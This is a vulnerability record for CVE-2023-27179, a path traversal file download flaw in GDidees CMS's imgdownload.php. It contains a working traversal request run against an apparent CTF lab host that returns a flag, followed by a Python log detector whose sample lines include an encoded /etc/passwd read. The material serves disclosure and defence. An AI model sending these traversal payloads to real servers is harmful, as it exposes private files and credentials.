
CVE-2023-27179

Information

Tags

  • GDidees CMS

Official database record

GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulnerability via the filename parameter at /_admin/imgdownload.php.

root@jmt-projekt:~# http http://eci-2ze18bprdg5ymu9xzww7.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag
HTTP/1.1 200 OK
Cache-Control: must-revalidate, post-check=0, pre-check=0, public
Connection: keep-alive
Content-Disposition: attachment; filename="flag.png"
Content-Length: 42
Content-Transfer-Encoding: $type\n
Content-Type: application/force-download
Date: Tue, 23 Jul 2024 15:57:00 GMT
Expires: 0
Pragma: no-cache
X-Powered-By: PHP/7.3.33

flag{27daaa6f-9770-4084-8fbe-b02a5a8d451a}
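
For defenders reviewing web server logs, a detection sketch for this issue follows. It is an added example, not code from GDidees CMS or from the original write-up. The log format, sample lines and function names are assumptions; only the endpoint and parameter name come from the record above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/_admin/imgdownload.php"  # endpoint named in the CVE record
PARAM = "filename"                       # parameter named in the CVE record
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access log (combined-log style); line 1 mirrors the request above.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jul/2024:15:57:00 +0000] "GET /_admin/imgdownload.php?filename=../../../../../../flag HTTP/1.1" 200 42',
    '203.0.113.5 - - [23/Jul/2024:15:57:05 +0000] "GET /_admin/imgdownload.php?filename=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 512',
    '198.51.100.7 - - [23/Jul/2024:15:58:10 +0000] "GET /_admin/imgdownload.php?filename=logo.png HTTP/1.1" 200 2048',
    '198.51.100.7 - - [23/Jul/2024:15:58:12 +0000] "GET /index.php?filename=../x HTTP/1.1" 200 100',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so nested encodings cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value escapes the intended directory: '..' segment, absolute path or NUL."""
    v = fully_decode(value).replace("\\", "/")
    return v.startswith("/") or ".." in v.split("/") or "\x00" in v

def suspicious_requests(log_lines):
    """Return (line_number, decoded filename) for traversal attempts on the endpoint."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if unquote(url.path) != TARGET_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                hits.append((number, fully_decode(value)))
    return hits

if __name__ == "__main__":
    for number, name in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: traversal in {PARAM}={name!r}")
```

The same `is_traversal` test also works as a server-side input check: a download handler that rejects any filename for which it returns true, and then resolves the remaining name inside a fixed image directory, cannot be steered outside that directory.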